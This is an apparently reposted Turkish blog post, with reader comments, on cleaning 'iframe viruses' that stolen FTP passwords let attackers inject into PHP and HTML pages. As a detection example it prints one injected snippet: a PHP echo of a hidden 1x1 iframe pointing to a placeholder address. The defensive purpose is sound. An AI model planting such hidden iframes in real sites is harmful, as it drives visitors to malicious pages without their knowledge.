Baglantilar


Sitenizin Php ve html sayfalarına bulaşan frame ve iframe virüsleri nedir?
Nasıl çalışır ve iframe virüsü nasıl temizlenir?

Bu aralar çok rastlıyorum bu duruma. Genelde CuteFTP programını Crackli kullanan arkadaşlarda bu durum meydana geliyor. Herzaman tavsiyem ücretsiz ve performanslı bir program olan FileZilla ’dır.

Frame virüsü nedir?

Frame ve iFrame olarak tanımlanan bu virüs, FTP yolu ile sitenize bulaşan bir virüs türüdür. Amacı, sitenizin içinde genelde 1×1 pixel lik sayfa açarak, kendi websitesine hit ve rant kazandırmaktır.

Bazıları ise bu hit kazandırmanın yanısıra, bulaşmasını sağlamak için zararlı kod indirilmesini de sağlıyor.

Bir diğer Çeşitleri ise, iframe virüslerinin, sitenizin Php ve html sayfalarına bulaşarak Google ‘de sandbox a düşürmek / zararlı site olarak tanımlamak. Bu tarz durumlarda hem hit, hemde karizmanızı kaybedebiliyorsunuz.

Çünki, Virüs bulunan bir siteye kimse girmek istemez….

virus

Bir iFrame virüsü nasıl anlaşılır?

Bir Php sayfasına bulaşan iframe virüsünün örnek kodu alttaki gibidir;

echo "<iframe src=\"http://siteadresi\123" width=1 height=1
style=\"visibility:hidden;position:absolute\"></iframe>";

Bu koda teknik açıdan biraz göz atalım.

Kodda Php nin echo formatı içinde iframe komutu ile bir sayfa açtırmak istiyor. Bu sayfanın konumlandırılmasında yatayda 1, dikeyde ise 1 pixel derinlik verilmiş.

Kodun çağrıldığı adreste üstte belirttiğim zararlı bir işlem bulunuyor olabilir.

iframe Virüsü Nasıl Temizlenir?

iFrame virüsleri genelde size FTP yolu ile bulaştı ise, tüm şifrelerinizi alır ve kayıt eder. Bu şifrelerinizi periyodik olarak bazı zamanlarda kontrol ederek FTP nize bağlanır. Eğer kodu sildiyseniz, zararlı yazılım ftp sifrenizi bildiginden tekrar girer ve virüs yazılırken tanımlanan Php ve diğer sayfalara bulaşır. Bu demektir ki, kodu silmek yeterli değil.

Şimdi adımlar ile neler yapabileceğimize göz atalım…

viruscuk

  • Bir FTP yazılımında Şifreniz Kayıtlı mı?

Eğer şifrenizi FTP programınızda kaydetme gibi bir alışkanlığınız varsa, bundan derhal vazgeçin! Tüm şifreleri FTP programınızdan temizleyin. Eğer Crackli bir FTP yazılımı kullanıyorsanız, (cuteFTP gibi) Kesinlikle bilgisayarınızdan kaldırın ve tavsiye ettiğimiz FileZilla yazılımını kurun.

  • Bilgisayarınızdaki virüsü temizlemelisiniz!

Bu amaç için sizlere, kaspersky ürünlerini tavsiye ediyorum. Bu Antivirüs yazılımı hakkındaki detaylı bilgiye ulaşmak için; https://www.hell-world.org/ownz/bilgisayar-ve-bilgi-guvenligini-korumak/ sayfasına göz atabilirsiniz.

  • Bir spyware taraması da fena olmazdı!

Ad-aware se programını websitesinden indirin. Bilgisayarınızı bir Spyware taramasından geçirin!

  • Virüsü temizledik Şimdi Sırada Sitemizden temizlemek!

Hemen yeni ve temiz bilgisayarımızda kurulu olan FTP programımız ile sitemize bağlanalım. Sitenizin tüm dosyalarını bilgisayarınıza indirin. İşte bu kısım en zahmetli kısım olacak. Çünki tek tek dosyalardaki kodları temizlemeniz gerekecek! (*)

Tüm dosyaları bilgisayarınıza indirdikten sonra, HTML editörünüz ile açarak, içinde tırnaklar olmadan: “script”, “frame”, “iframe” gibi kelimeleri tek tek aratın. Eğer buldugunuz kod size ait olan bir iframe kodu değilse, zararlı kodu hemen silin!

Eğer birçok dosyaya sahipseniz, bu işlemi birçok HTML editörünün de desteklediği, “tüm sayfalarda bul” seçeneyi ile tüm açık dökümanlarda aratabilirsiniz. Dreamweaver CTRL+H komutu ile bu pencereye ulasip, “find all open files” kısmını işaretlerseniz, tüm dosyalarınızda bunları tek arama ile bulabilir / değiştirebilirsiniz.

  • Genelde bulaştığı sayfalar:

iframe virüsü genelde alttaki dosyalara bulaşır:

  1. index.html
  2. index.php
  3. index.shtml
  4. index.htm
  5. footer.php
  6. header.php
  7. admin.php
  8. connect.php
  9. login.php
  10. logout.php
  11. contact.php

Konu hakkında bir sorunuz olur ise, burdan belirtmekte çekinmeyin, TeknoHell.com olarak, cevaplamaktan mutluluk duyacağız!

Kaynak:

http://www.teknohell.com/web/frame-iframe-virusu-ve-Php-html-dosyalardan-temizlenmesi.html

- Bu yazı şu ana kadar 9.645 kez görüntülendi..
Yorumlar ve Geribildirimler
6 adet
tufan #
30 Nisan 2009, 09:02

elinize emeğinize sağlık ilk defa bu kadar kolay anlatımlı bir acıklama buldum. çok teşekkürler.

salihrocker #
21 Mayıs 2009, 22:28

çok güzel açıklamışsın kardeş, bakalım sorunu çözebilecek miyim ?

Ege #
8 Haziran 2009, 22:54

Merhabalar; dediğiniz kodu forumumun index.php dosyasında ve daha başka dosyalarda buldum. Fakat neresini sileceğimi çözemedim. Denemek için silip tekrar yüklüyorum fakat bu sefer de kodun bulunduğu satırda hata veriyor ve açılmıyor…

echo “”;

Ta2moj #
26 Haziran 2009, 08:42

Üstad, bu “iframe” belasından daimi olarak kurtuluruz umarım.
Eline sağlık…

olcay #
24 Temmuz 2009, 17:24

Yorumlarınız gerçekten güzel. Fakat size tavsiyem ilk önce temiz bir PC ki bu virüsü temizlemek o kadar kolay değil. Kullandığımız anti virüs programları dosya koruma bazında olduğundan dolayı bazı kısımları atlıyor ve görmüyor. Bu sistemde bulunan virüslerin tam yapıları şu şekild bredolap.aa veya rustock.nim şeklinde geliyor diğer adları botnetlog.11 ve agentbot ki bu dosylar temp dosyları sistem32 içerisinde dirvers klasörünün içindeki bölümleri işgal ediyorlar. Kendilerini başka partitionlara, yani hdd nin başka bölümlerinde kopyaladıkları içinde görülmüyor veya anti virüs programları ile tespitide mümkün olmuyor. Bunun için luncher özelliği olan bi virüs temizleyici ile temizlemeniz gerek. Dr. Web ( ftp://ftp.drweb.com/pub/drweb/cureit/launch.exe )kullanmanızı önerebilirim. Ücretsiz bir yazılım sizide fazla uğraştırmayacaktır. İndirin ve temizleyin cinsinde birşey. Temizlikten sonra virüsten etkilenmişenizki öle olacak windowsunuz düzgün çalışmayacak ve hatta çökebilir de. Zaten windowsunuzu yeniden kurmanızı tavsiye ederim.

acelikal #
16 Mayıs 2013, 12:34

merhaba hocam resellerim var ve resellerimdeki butun sitelerimde bb.html , work.html adında dosyalar oluşmuş ve dosyaların içeriğinde ise başka bir siteye yönlendirme kodları var siliyorum tekrar oluşuyorlar nasıl temizlerim bunları ?

Sizin Yorumunuz



Yazilar iin RSS aboneligi